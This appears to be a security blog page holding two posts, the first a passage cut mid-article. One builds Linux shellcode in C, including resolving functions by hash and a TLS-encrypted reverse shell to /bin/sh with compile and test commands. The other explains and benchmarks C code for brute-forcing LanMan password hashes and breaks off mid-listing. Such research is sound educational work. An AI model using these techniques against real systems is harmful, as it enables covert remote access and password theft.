void *get_proc_address2(void *module, uint32_t hash) {
    char            *path=NULL;
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    uint64_t        *ptrs, addr;
    struct link_map *map;
    
    if(module == NULL) return NULL;
    
    // 1. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(module, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 2. obtain global offset table
      got = elf_get_dyn(module, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 3. search through link_map for module
        while (map != NULL) {
          // this our module?
          if(map->l_addr == (uint64_t)module) {
            path = map->l_name;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    // not found? exit
    if(path == NULL) return NULL;
    addr = (uint64_t)get_proc_address3(path, hash);
    
    return (void*)((uint64_t)module + addr); 
}

// lookup by hash using the path of library (static lookup)
void* get_proc_address3(const char *path, uint32_t hash) {
    int         i, fd, cnt=0;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    Elf64_Sym  *syms=0;
    void       *addr=NULL;
    char       *strs=0;
    uint8_t    *map;
    struct stat fs;
    int         str[8];
    
    // /proc/self/exe
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x652f666c;
    str[3] = 0x00006578;

    // open file
    fd = _open(path == NULL ? (char*)str : path, O_RDONLY, 0);
    if(fd == 0) return NULL;
    // get the size
    if(_fstat(fd, &fs) == 0) {
      // map into memory
      map = (uint8_t*)_mmap(NULL, fs.st_size,  
        PROT_READ, MAP_PRIVATE, fd, 0);
      if(map != NULL) {
        ehdr = (Elf64_Ehdr*)map;
        shdr = (Elf64_Shdr*)(map + ehdr->e_shoff);
        // locate static or dynamic symbol table
        for(i=0; i<ehdr->e_shnum; i++) {
          if(shdr[i].sh_type == SHT_SYMTAB ||
             shdr[i].sh_type == SHT_DYNSYM) {
            strs = (char*)(map + shdr[shdr[i].sh_link].sh_offset);
            syms = (Elf64_Sym*)(map + shdr[i].sh_offset);
            cnt  = shdr[i].sh_size/sizeof(Elf64_Sym);
          }
        }
        // loop through string table for function
        for(i=0; i<cnt; i++) {
          // if found, save address
          if(gnu_hash(&strs[syms[i].st_name]) == hash) {
            addr = (void*)syms[i].st_value;
          }
        }
        _munmap(map, fs.st_size);
      }
    }
    _close(fd);
    return addr;
}

8. Loading Shared Objects

The normal way to load a shared object and resolve the address of a function is via dlopen and dlsym respectively. Both of these functions are exported by libdl.so – the dynamic linking library. For my build of Debian, libc.so doesn’t use code inside libdl.so because the mechanics of loading libraries and resolving functions are actually within ld.so – the dynamic linker/loader. This loader also doesn’t export or make publicly available either of the functions required, but pointers to the real functions can be found in a read-only shared area of memory called _rtld_global_ro that is exposed via the symbol table. This is a structure defined in /sysdeps/generic/ldsodefs.h that when compiled with SHARED defined will include pointers to the dynamic loading functions.

8.1 __libc_dlopen_mode and __libc_dlsym

Before discussing anything about _rtld_global_ro, you can find functions in the symbol table of libc.so that allow you to dynamically load shared objects without using libdl.so

user@nostromo:~/hub/shellcode$ readelf /lib/x86_64-linux-gnu/libc-2.24.so -s |grep -i "__libc_dl"
  1165: 000000000011fa60    17 FUNC    GLOBAL DEFAULT   13 __libc_dl_error_tsd@@GLIBC_PRIVATE
  1216: 000000000011f4b0    35 FUNC    GLOBAL DEFAULT   13 __libc_dlclose@@GLIBC_PRIVATE
  2043: 000000000011f440   100 FUNC    GLOBAL DEFAULT   13 __libc_dlsym@@GLIBC_PRIVATE
  2152: 000000000011f3f0    80 FUNC    GLOBAL DEFAULT   13 __libc_dlopen_mode@@GLIBC_PRIVATE

To load libraries, we need to resolve the address of __libc_dlopen_mode and if we want to resolve the address of functions by string, we also need __libc_dlsym. The following code shows how you might load libgnutls.so using a static path.

  void *clib, *gnutls;
  
  // 1. resolve the address of _dl_addr in libc.so
  clib = get_module_handle("libc");
  _dl_open = (dl_open_t)get_proc_address(clib, "__libc_dlopen_mode");
  
  // 2. load gnutls
  gnutls = _dl_open("/usr/lib/x86_64-linux-gnu/libgnutls.so", RTLD_LAZY);

Now onto the _rtld_global_ro object that may be of interest to you. The following shows the function pointers for dynamic loading. Depending on the version of glibc, the structure itself can differ in size. I was curious to see if it was possible to find _dl_open using this object in the event __libc_dlopen_mode was not available for any reason.

user@nostromo:~/hub/shellcode$ readelf -s /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 |grep -i "rtld_global_ro"
    25: 0000000000223ca0   376 OBJECT  GLOBAL DEFAULT   16 _rtld_global_ro@@GLIBC_PRIVATE
#ifdef SHARED
  // We add a function table to _rtld_global which is then used to
  //   call the function instead of going through the PLT.  The result
  //   is that we can avoid exporting the functions and we do not jump
  //   PLT relocations in libc.so.
  
  void (*_dl_debug_printf) (const char *, ...)
       __attribute__ ((__format__ (__printf__, 1, 2)));
  
  int (internal_function *_dl_catch_error) (const char **, const char **,
					    bool *, void (*) (void *), void *);
  
  void (internal_function *_dl_signal_error) (int, const char *, const char *,
					      const char *);
  
  void (*_dl_mcount) (ElfW(Addr) frompc, ElfW(Addr) selfpc);
  
  lookup_t (internal_function *_dl_lookup_symbol_x) (const char *,
						     struct link_map *,
						     const ElfW(Sym) **,
						     struct r_scope_elem *[],
						     const struct r_found_version *,
						     int, int,
						     struct link_map *);
                 
  int (*_dl_check_caller) (const void *, enum allowmask);
  
  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,
		     Lmid_t nsid, int argc, char *argv[], char *env[]);
  
  void (*_dl_close) (void *map);
  
  void *(*_dl_tls_get_addr_soft) (struct link_map *);
  
#ifdef HAVE_DL_DISCOVER_OSVERSION
  int (*_dl_discover_osversion) (void);
#endif

You can view the data for a process under GDB if you know the address of _rtld_global_ro.

(gdb) x/40xg 0x7ffff7ffcca0
0x7ffff7ffcca0 <_rtld_global_ro>:     0x0004099000000000  0x00007fffffffe4d9
0x7ffff7ffccb0 <_rtld_global_ro+16>:  0x0000000000000006  0x0000000000001000
0x7ffff7ffccc0 <_rtld_global_ro+32>:  0x0000000000000000  0x00007ffff7fcca30
0x7ffff7ffccd0 <_rtld_global_ro+48>:  0x0000000000000004  0x0000000000000064
0x7ffff7ffcce0 <_rtld_global_ro+64>:  0x0000000100000002  0x0000000000000000
0x7ffff7ffccf0 <_rtld_global_ro+80>:  0x000003030000037f  0x00000000bfebfbff
0x7ffff7ffcd00 <_rtld_global_ro+96>:  0x0000000000000000  0x00007fffffffe390
0x7ffff7ffcd10 <_rtld_global_ro+112>: 0x0000001600000001  0x02100800000406e3
0x7ffff7ffcd20 <_rtld_global_ro+128>: 0xbfebfbff7ffafbbf  0x029c67af00000000
0x7ffff7ffcd30 <_rtld_global_ro+144>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd40 <_rtld_global_ro+160>: 0x0000000000000000  0x0000004e00000006
0x7ffff7ffcd50 <_rtld_global_ro+176>: 0x00000000000003c0  0x000000000034ccf1
0x7ffff7ffcd60 <_rtld_global_ro+192>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd70 <_rtld_global_ro+208>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd80 <_rtld_global_ro+224>: 0x00007ffff7df503c  0x0000000000000000
0x7ffff7ffcd90 <_rtld_global_ro+240>: 0x0000000000000000  0x00007ffff7ffec28
0x7ffff7ffcda0 <_rtld_global_ro+256>: 0x00007ffff7ffa000  0x00007ffff7ffe708
0x7ffff7ffcdb0 <_rtld_global_ro+272>: 0x0000000000000000  0x00007ffff7de9630
0x7ffff7ffcdc0 <_rtld_global_ro+288>: 0x00007ffff7de85d0  0x00007ffff7de8390
0x7ffff7ffcdd0 <_rtld_global_ro+304>: 0x00007ffff7deaa30  0x00007ffff7de2ea0

Using some simple code, we can identify with _dl_addr the addresses that belong to ld-linux.

typedef struct {
  const char *dli_fname;  // File name of defining object.   
  void       *dli_fbase;  // Load address of that object.    
  const char *dli_sname;  // Name of nearest symbol.         
  void       *dli_saddr;  // Exact value of nearest symbol.  
} Dl_info;

typedef int (*dl_addr_t)(
  const void *address, 
  Dl_info *info, 
  struct link_map **mapp, 
  const Elf64_Sym **symbolp);
  
  -------------------------------
    dl_addr_t _dl_addr;
    void      *clib, *ld;
    uint64_t  *rtld;
    DL_info   info;
    
    // 1. resolve the address of _dl_addr in libc.so
    clib = get_module_handle("libc");
    _dl_addr = (dl_addr_t)get_proc_address(clib, "_dl_addr");
    
    // 2. resolve the address of _rtld_global_ro in ld-linux.so
    ld = get_module_handle("ld-linux");
    rtld = (uint64_t*)get_proc_address(ld, "_rtld_global_ro");
    
    // 3. try the first 64 entries
    for(i=0;i<64;i++) {
      if(_dl_addr((void*)rtld[i], &info, &map, &sym)) {
        const char *str = info.dli_sname ? : "N/A";
        printf("[%i] %p : %-10s : %s \n", 
          i, rtld[i], str, info.dli_fname);
      }
    }

Below shows basic output using the above code.

[28] 0x7f5dde45c03c : N/A        : /lib64/ld-linux-x86-64.so.2 
[32] 0x7ffd6d904000 : LINUX_2.6  : linux-vdso.so.1 
[35] 0x7f5dde450630 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_printf 
[36] 0x7f5dde44f5d0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_catch_error
[37] 0x7f5dde44f390 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_signal_error
[38] 0x7f5dde451a30 : _dl_mcount : /lib64/ld-linux-x86-64.so.2  // _dl_mcount
[39] 0x7f5dde449ea0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_lookup_symbol_x
[40] 0x7f5dde452fc0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_check_caller
[41] 0x7f5dde453540 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_open
[42] 0x7f5dde455560 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_close
[43] 0x7f5dde452b40 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_tls_get_addr_soft
[44] 0x7f5dde457b80 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_discover_osversion

In this instance, we know the address of _dl_open will be at _rtld_global_ro + 41*8. It’s certainly possible to call the function, but internally is a check for where the call originated from. dl_check_caller will determine if the call originated from a valid Dynamic Shared Object (DSO).

// Bit masks for the objects which valid callers can come from to
//   functions with restricted interface.  
enum allowmask {
    allow_libc = 1,
    allow_libdl = 2,
    allow_libpthread = 4,
    allow_ldso = 8
  };

The following is a snippet of the code to validate a caller from elf/dl-caller.c.

static void dl_open_worker (void *a) {
  struct dl_open_args *args = a;
  const char *file = args->file;
  int mode = args->mode;
  struct link_map *call_map = NULL;

  // Check whether _dl_open() has been called from a valid DSO.
  if (__check_caller (args->caller_dl_open,
		      allow_libc|allow_libdl|allow_ldso) != 0)
    _dl_signal_error (0, "dlopen", NULL, N_("invalid caller"));

As you can see, only libc.so, libdl.so and ld.so are permitted to load a library. Bypassing this check is trivial, but thankfully not required because libc.so exports __libc_dlopen_mode

8.2 Parsing /etc/ld.so.conf

A list of shared libraries are stored in /etc/ld.so.cache and a list of trusted paths can be found in /etc/ld.so.conf. If you wanted to map a library into memory without knowing the full path, one way would be checking each of the entries in cache or by appending the name of a library to each of the paths found in the configuration file. For this shellcode, all libraries required are stored in the cache list and dlopen doesn’t require a full path.

9. Reverse Shell using SSL/TLS

The reverse shell uses synchronization so that it’s possible to create a sub process running /bin/sh with stdin,stdout and stderr being redirected through anonymous pipes. We then monitor I/O signals on those anonymous pipes and a TCP socket. This allows us to encrypt/decrypt using the GNU TLS functions. It is based on epl.c that does not use any encryption for interacting with /bin/sh.

9.1 Data Table

Since we can’t use any global variables for a PIC, everything is stored on the stack. To manage this data more efficiently, I’ve defined a structure that contains all the pointers to functions and variables for various operations should it be required by other subroutines.

typedef struct _data_t {
    int s;       // socket file descriptor

    union {
      uint64_t hash[64];
      void     *addr[64];
      struct {
        // gnu c library functions
        pipe_t          _pipe;
        fork_t          _fork;
        socket_t        _socket;
        // .... snipped
      };
    } api;
} data_t;

9.2 Strings

Declaring strings is a slight problem for a shellcode because gcc will move them all to a read-only segment (.rodata) that is separate from the (.text) segment. There are a few ways to work around this. elfmaster suggests using the -N option of the linker ld to combine all segments into one. fishstiqz uses a combination of macros and inline assembly. What I do is declare an array of integers large enough to hold the string. That array is then initialized using the string converted to integers. gcc should do this automatically, but it’s currently not an option. The following code demonstrates the idea where len is initialized to the length of string and str is an empty array of integers. i.e int str[16];

    int *str;
    
    len = strlen(input);
    str = (int*)input;
    
    // align up by 4
    len = (len & -4) + 4;
    len >>= 2;
    
    for(i=0;i<len;i++) {
      printf("str[%i] = 0x%08lx;\n", i, str[i]);
    }

As an example, the string “/proc/self/maps” becomes:

    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;

One might also consider storing all strings in a separate block of data that is then simply passed to each subroutine as a parameter.

9.3 Compiling

A Makefile is provided to compile and extract the shellcode automatically. It uses gcc to compile and objcopy to extract. xxd then converts the binary in tls.bin to a C style string and redirects output to tls.h. Don’t forget that tls.c uses port 1234 and 127.0.0.1 as the peer address because it’s only a proof of concept.

  gcc -O0 -nostdlib -fpic tls.c -o tls
  objcopy -O binary --only-section=.text tls tls.bin
  xxd -i tls.bin > tls.h

The gcc option -O0 implies disabling optimizations. -nostdlib implies not using any standard library functions and -fpic implies generating position-independent code. Objcopy simply extracts the executable code stored in the .text segment.

9.4 Testing

ncat, that comes bundled with nmap supports raw I/O using TLS/SSL. The following will listen for incoming SSL/TLS connections on port 1234 using any ipv4 interface.

  ncat -lvk4 1234 --ssl

runsc.c can be used to execute the code from memory.

  runsc -x -f tls.bin

10. Summary

As you can see, it’s entirely possible to avoid using pure assembly code for a PIC. Admittedly, some assembly is used here to workaround limitations of C itself, but would be completely avoidable if the C code was supplied with a valid address of the host process, libc.so or any other shared object. Sources can be found here.

Posted in assembly, linux, shellcode | Tagged , , , , | Leave a comment

How the L0pht (probably) optimized attack against the LanMan hash.

  1. Introduction
  2. Data Encryption Standard
  3. The LanMan Algorithm
  4. Brute Force Attack
  5. Version 1
  6. Precomputing Key Schedules 1
  7. Version 2
  8. Using Macros For The Key Schedule Algorithm
  9. Initial and Final Permutation
  10. Skipping Rounds
  11. Version 3
  12. Precomputing Key Schedules 2
  13. Version 4
  14. Results

1. Introduction

Some of you may remember a famous group of hackers that operated out of a loft (or attic) in Boston, Massachusetts, USA between 1992 and 2000 that called themselves L0pht Heavy Industries. Perhaps a defining moment in the group’s history was in May 1998 when they testified before the United States Congress, forewarning about the fragility of the Internet and how it could be shut down in 30 minutes using the Border Gateway Protocol (BGP). Most oldskool hackers will remember them for being some of the first security researchers to practice responsible disclosure of software vulnerabilities via advisories, aswell as maintaining a number of websites like HackerNews.com, the Black Crawling Systems Archives, the Whacked Mac Archives and Guerilla.net.

Like many people, I remember the group for writing L0phtCrack, a tool designed to recover passwords protected by the Windows operating system. L0phtCrack was originally published with an advisory almost 22 years ago in April 1997. In the year 2000, a now defunct company called @atstake acquired L0pht, including the ownership rights to L0phtCrack. In 2004, Symantec acquired @atstake before discontinuing development and distribution of L0phtCrack in 2005. In 2009, members of the original L0pht group (Zatko, Wysopal, and Rioux) reacquired ownership rights to L0phtCrack and continued with its development up to the present day. Those of you that want to know more about the group can read History of the L0pht.

This post suggests some ways the L0pht may have accelerated recovery of passwords protected by the LanMan (LM) hash that is derived from the Data Encryption Standard (DES). I don’t reveal any Top Secret technique for cracking DES that only L0pht or some alphabet agencies know about. Similar optimizations were implemented over twenty years ago by Alexander Peslyak and Roman Rusakov in another popular password recovery tool called John The Ripper.

l0pht

2. Data Encryption Standard

DES is a block cipher that operates on plaintext blocks of 64-bits and returns ciphertext blocks of the same size. Each key can be 56-bits in total giving us 2^{56} (72,057,594,037,927,936), or approximately 72 quadrillion possible keys. A 56-bit key is expanded into 16 subkeys or round keys, each of which is 48-bits long. It has for over 20 years been considered obsolete and insecure, but continues to be used mainly to support legacy systems.

What follows is a list of notable events around initial research into cracking DES, including the LanMan hash derived from DES.

January 1997 Cryptographer Eli Biham publishes his paper at Fast Software Encryption 4 titled A Fast New DES Implementation in Software. It describes a novel way to optimize the Data Encryption Standard using simple bitwise operations (XOR, AND, NOT, OR). Although unrelated to the development of L0phtCrack, the technique would later be used to optimize attacks against the LanMan hash in tools like John The Ripper.
January 1997 Rocke Verser launches DESCHALL in response to an offer by RSA to crack DES for a $10,000 prize.
March 1997 Samba developer Jeremy Allison releases pwdump. It enables Administrators to dump LM (derived from DES) and NTLM (derived from MD4) hashes stored in the Security Account Manager (SAM) database on Windows NT.
April 1997 L0phtCrack v1.0 released. It primarily exploits the poor design of the LanMan algorithm to recover plaintext passwords.
May 1997 Microsoft releases Service Pack 3 for Windows NT that includes “SYSKEY”; an optional component designed to prevent pwdump working properly.
June 1997 Rocke Verser announces the recovery a 56-bit DES key.
July 1997 L0phtCrack v1.5 released. Includes a much more detailed analysis of Server Message Block (SMB) authentications. Cryptographer David Wagner shares his observations on the the challenge response/pair and suggests ways to optimize attacks against it.
August 1997 L0pht attend the Beyond HOPE (The Hackers on Planet Earth) conference in New York city. Discuss the lack of adequate security provided by vendors in various technologies.
February 1998 L0phtCrack v2.0 released. Includes an SMB session network sniffer, a multithreaded brute force algorithm and faster search algorithm for large databases.
May 1998 Matthew Kwan releases his “bitslice” code based on the paper by Eli Biham.
July 1998 The Electronic Frontier Foundation build a DES cracker called “Deep Crack” and recover a 56-bit key in 56 hours using a device that costs $250,000.
January 1999 Deep Crack and distributed.net break a DES key in 22 hours and 15 minutes.
January 1999 L0phtCrack v2.5 released. The DES routines have been highly optimized in assembler for Pentium, Pentium MMX, Pentium Pro, and Pentium II specific processors. This results in a 450% speed increase. All alphanumeric passwords can be found in under 24 hours on a Pentium II/450.

What I try to focus on in this post is how the L0pht gained a “450% speed increase” over previous versions of the software, but first, how are LanMan hashes created?

3. The LanMan Algorithm

  1. The password is restricted to a maximum of fourteen characters. (null-padded if required)
  2. The password is converted to uppercase.
  3. The password is encoded in the system OEM code page.
  4. The password is split into 7-byte halves and used to create two DES keys.
  5. Each key is used to encrypt the string KGS!@#$% using DES in ECB mode, resulting in two 8-byte ciphertext values. The string “KGS!@#$% could possibly mean Key of Glen and Steve with the combination of Shift + 12345. Glen Zorn and Steve Cobb are the authors of RFC 2433 (Microsoft PPP CHAP Extensions).
  6. The two ciphertext values are concatenated to create a 16-byte value, which is the LM hash.

Using the above details, the following code uses OpenSSL to generate a LanMan hash. The only thing missing is the OEM encoding. For that reason, hashes generated by this code will not always match those generated by Windows itself. Internally, Windows originally used the CharToOem API before creating a DES key. This is important to remember because some passwords generated by Windows will simply not be recovered unless the cracker uses CharToOem or CharToOemBuff before hand.

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#include <openssl/des.h>

void DES_str_to_key (char str[], uint8_t key[]) {
    int i;

    key[0] = str[0] >> 1;
    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
    key[7] = str[6] & 0x7F;

    for (i = 0;i < 8;i++) {
      key[i] = (key[i] << 1);
    }
    DES_set_odd_parity ((DES_cblock*)key);
}

char* lmhash(char *pwd) {
    DES_cblock       key1, key2;
    DES_key_schedule ks1, ks2;
    const char       ptext[]="KGS!@#$%";
    static char      hash[64], lm_pwd[16];
    uint8_t          ctext[16];
    size_t           i, pwd_len = strlen(pwd);
    
    // 1. zero-initialize local buffer
    memset(lm_pwd, 0, sizeof(lm_pwd));
    
    // 2. convert password to uppercase (restricted to 14 characters)
    for(i=0; i<pwd_len && i<14; i++) {
      lm_pwd[i] = toupper((int)pwd[i]);
    }
    
    // 3. create two DES keys
    DES_str_to_key(&lm_pwd[0], (uint8_t*)&key1);
    DES_str_to_key(&lm_pwd[7], (uint8_t*)&key2);
    DES_set_key(&key1, &ks1);
    DES_set_key(&key2, &ks2);
    
    // 4. encrypt plaintext
    DES_ecb_encrypt((const_DES_cblock*)ptext, 
      (DES_cblock*)&ctext[0], &ks1, DES_ENCRYPT);

    DES_ecb_encrypt((const_DES_cblock*)ptext, 
      (DES_cblock*)&ctext[8], &ks2, DES_ENCRYPT);
      
    // 5. convert ciphertext to string
    for(i=0; i<16; i++) {
      snprintf(&hash[i*2], 3, "%02X", ctext[i]);
    }
    return hash;
}


int main(int argc, char *argv[]) {
    if (argc!=2) {
      printf("usage: lmhash <password>\n");
      return 0;
    }
    
    printf("LM Hash: %s\n", lmhash(argv[1]));
    return 0;
}

We identify a number of weaknesses here based on the algorithm.

  1. Electronic Code Book (ECB) mode using plaintext that is always the same. Contrast this with unix crypt3() that encrypts a nonce/salt resulting in unique ciphertext. As a result of the LanMan algorithm encrypting the same plaintext, passwords seven characters or less will always include 0xAAD3B435B51404EE in the 16-byte LM hash.
  2. The fourteen character password is used to create two 7-byte or 56-bit DES keys. This means a brute force attack only requires 95^{7} attempts instead of 95^{14}
  3. Passwords are converted to uppercase, reducing the keyspace to 69^{7} attempts.

4. Brute Force Attack

Brute force has sometimes been referred to as “dumb mode” because rather than select passwords based on a predefined set of rules, it will simply attempt all possible combinations from a set of numbers and letters, including ones that are unlikely to be used in practice. Passwords should always be easy to recall, and even today it’s unusual for people to pick something that might be difficult to remember later. Having said that, rules are imperfect and sometimes only an exhaustive search of the keyspace will succeed.

The following screenshot is of L0phtcrack 2.5 running inside a virtual machine. As you can see, it averages around 5.64 million tries/keys per second.

The brute force cracker implemented in lmcrack is simply to demonstrate the overall gains achieved via simple optimizations and isn’t intended to be used for anything else. Those that want to recover passwords should use a fully functional password cracker.

5. Version 1

The first version is simply using the OpenSSL library. L0phtCrack v1.0 and v1.5 both used DES routines from the OpenSSL library.

static bool crack_lm1(void *param) {
    int              i;
    DES_cblock       deskey;
    DES_key_schedule ks;
    uint8_t          pwd[8]={0};
    const char       ptext[]="KGS!@#$%";
    uint8_t          ctext[8];
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // initialize password
    for(i=0;i<7;i++) {
      if(c->pwd_idx[i] == ~0UL)break;
      pwd[i] = c->alphabet[c->pwd_idx[i]];
    }
      
    // while not stopped
    while(!c->stopped) {
      // convert password to DES odd parity key
      DES_str_to_key(pwd, deskey);
      // create DES subkeys 
      DES_set_key(&deskey, &ks);
      // encrypt plaintext
      DES_ecb_encrypt((const_DES_cblock*)ptext, 
        (DES_cblock*)ctext, &ks, DES_ENCRYPT);
      
      // increase how many passwords processed
      c->complete++;
      
      // if hashes match, set found and exit loop
      if(memcmp(ctext, c->hash.b, 8)==0) {
        c->found=true;
        return true;
      }
      // decrease total tried. if none left, exit
      if(--c->total_cbn == 0) {
        return false;
      }
      // update password index values
      for(i=0;;i++) {
        // increase one. if not length of alphabet, break.
        if(++c->pwd_idx[i] != c->alpha_len) {
          pwd[i] = c->alphabet[c->pwd_idx[i]];
          break;
        }  
        // reset index
        c->pwd_idx[i]=0;
        pwd[i] = c->alphabet[0];
      }
    }
    // we didn't find it
    return false;
}

The screenshot below shows 2.46 million keys per second are tested. It uses no optimization at all, apart from those used by the OpenSSL library.

6. Precomputing Key Schedules 1

The simple design of the DES key schedule algorithm makes both differential and linear attacks easier. That is not to imply the design was simplified to facilitate attacks. It was simplified to implement on 1970s hardware with wiring. The lack of non-linear operations means that no bits in a subkey overlap with another subkey. This allows us to use a bitwise OR / bitwise XOR to combine subkeys and generate completely new ones.

We can generate key schedules for each unique bit of a 56-bit key without requiring a large amount of storage. DES_init_keys() will perform this operation and only uses 229,376 bytes of RAM. That’s 256 key schedules (0x00-0xFF) for 7 bytes.

void DES_str_to_key (char str[], uint8_t key[]) {
    int i;

    key[0] = str[0] >> 1;
    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
    key[7] = str[6] & 0x7F;

    for (i = 0;i < 8;i++) {
      key[i] = (key[i] << 1);
    }
    DES_set_odd_parity ((DES_cblock*)key);
}

// initialize 7*256 key schedules
void DES_init_keys(DES_key_schedule ks_tbl[7][256]) {
    DES_cblock key;
    int        i, j;
    char       pwd[8];
    
    memset(pwd,0,sizeof(pwd));
    
    // for each byte of a 56-bit key
    for(i=0;i<7;i++) {
      // create 256 key schedules
      for(j=0;j<256;j++) {
        pwd[i]=j;
        DES_str_to_key(pwd, (uint8_t*)&key);
        DES_set_key(&key, &ks_tbl[i][j]);
      }
      // clear byte
      pwd[i]=0;
    }
}

DES_set_keyx() works in the same way DES_set_key() does except it uses a precomputed table. As you will see later, this approach is much faster than using the function provided by OpenSSL. We are exploiting the lack of non-linear operations in the key scheduling algorithm and the fact no bits overlap with one another. A bitwise OR is used here, but an XOR will work too.

/ generate DES key schedule from precomputed DES schedules
void DES_set_keyx(DES_cblock*key, 
  DES_key_schedule *ks, DES_key_schedule ks_tbl[7][256]) 
{
    uint64_t *s, *d;
    uint8_t  *k=(uint8_t*)key;
    size_t   i, j;
    
    d = (uint64_t*)ks;
    
    // zero initialize
    for(i=0; i<128/8; i++) 
      d[i]=0;
    
    // for each byte of a 56-bit key
    for(i=0; i<7; i++) {
      // get a key schedule
      s = (uint64_t*)&ks_tbl[i][k[i]];
      
      // perform a bitwise OR
      for(j=0; j<128/8; j++) 
        d[j] |= s[j];
    }
}

7. Version 2

This is similar to version 1 with the obvious difference of using precomputed DES schedules.

static bool crack_lm2(void *param) {
    int              i;
    DES_key_schedule ks;
    uint8_t          pwd[7+1]={0};
    const char       ptext[]="KGS!@#$%";
    uint8_t          ctext[8];
    DES_key_schedule ks_tbl[7][256];
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // precompute key schedules
    DES_init_keys(ks_tbl);
    
    // initialize password
    for(i=0;i<7;i++) {
      if(c->pwd_idx[i] == ~0UL)break;
      pwd[i] = c->alphabet[c->pwd_idx[i]];
    }
      
    // while not stopped
    while(!c->stopped) {
      // create DES subkeys from index values
      DES_set_keyx((DES_cblock*)pwd, &ks, ks_tbl);
      // encrypt plaintext
      DES_ecb_encrypt((const_DES_cblock*)ptext, 
        (DES_cblock*)ctext, &ks, DES_ENCRYPT);
      
      // increase how many passwords processed
      c->complete++;
      
      // if hashes match, set found and exit loop
      if(memcmp(ctext, c->hash.b, 8)==0) {
        c->found=true;
        return true;
      }
      // decrease total tried. if none left, exit
      if(--c->total_cbn == 0) return false;
      // update password index values
      for(i=0;;i++) {
        // increase one. if not length of alphabet, break.
        if(++c->pwd_idx[i] != c->alpha_len) {
          pwd[i] = c->alphabet[c->pwd_idx[i]];
          break;
        }  
        // reset index
        c->pwd_idx[i]=0;
        pwd[i] = c->alphabet[0];
      }
    }
    // we didn't find it
    return false;
}

4.44 million keys per second are tested which is a distinct improvement over version 1.

8. Using Macros For The Key Schedule Algorithm

In a brute force attack, we only require changing one byte in the password string for each iteration. However, DES_set_keyx will derive a key schedule from all 7 bytes. DES_init_keys2() is a new function that will generate DES key schedules using an alphabet and order them in a way that allows us to use macros for creating new key schedules.

// initialize key schedules for alphabet
void DES_init_keys2(char alphabet[], 
  DES_key_schedule ks_tbl[7][256]) 
{
    DES_cblock key;
    char       pwd[7+1];
    size_t     i, j, alpha_len=strlen(alphabet);
    
    memset(pwd,0,sizeof(pwd));
    
    // for each byte of a 56-bit key
    for(i=0;i<7;i++) {
      // create key schedules for each character of the alphabet
      for(j=0;j<alpha_len;j++) {
        pwd[i] = alphabet[j];
        DES_str_to_key(pwd, (uint8_t*)&key);
        DES_set_key(&key, &ks_tbl[i][j]);
      }
      // clear byte
      pwd[i]=0;
    }
}

The following macros replace DES_set_keyx and use vector instructions provded by SSE2 and AVX2 to improve performance.

// create DES subkeys using precomputed schedules
// using AVX2 is slightly faster than SSE2, but not by much.
#if defined(AVX2)
#include <immintrin.h>

#define DES_SET_KEY(idx) { \
    __m256i *s = (__m256i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    __m256i *p = (__m256i*)&ks[idx]; \
    __m256i *d = (__m256i*)&ks[idx-1]; \
    if (idx == 7) { \
        d[0] = s[0]; d[1] = s[1]; \
        d[2] = s[2]; d[3] = s[3]; \
    } else { \
        d[0] = _mm256_or_si256(s[0], p[0]); \
        d[1] = _mm256_or_si256(s[1], p[1]); \
        d[2] = _mm256_or_si256(s[2], p[2]); \
        d[3] = _mm256_or_si256(s[3], p[3]); \
    } \
}
#elif defined(SSE2)
#include <emmintrin.h>

#define DES_SET_KEY(idx) { \
    __m128i *s = (__m128i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    __m128i *p = (__m128i*)&ks[idx]; \
    __m128i *d = (__m128i*)&ks[idx-1]; \
    if (idx == 7) {\
        d[0] = s[0]; d[1] = s[1]; \
        d[2] = s[2]; d[3] = s[3]; \
        d[4] = s[4]; d[5] = s[5]; \
        d[6] = s[6]; d[7] = s[7]; \
    } else { \
        d[0] = _mm_or_si128(s[0], p[0]); \
        d[1] = _mm_or_si128(s[1], p[1]); \
        d[2] = _mm_or_si128(s[2], p[2]); \
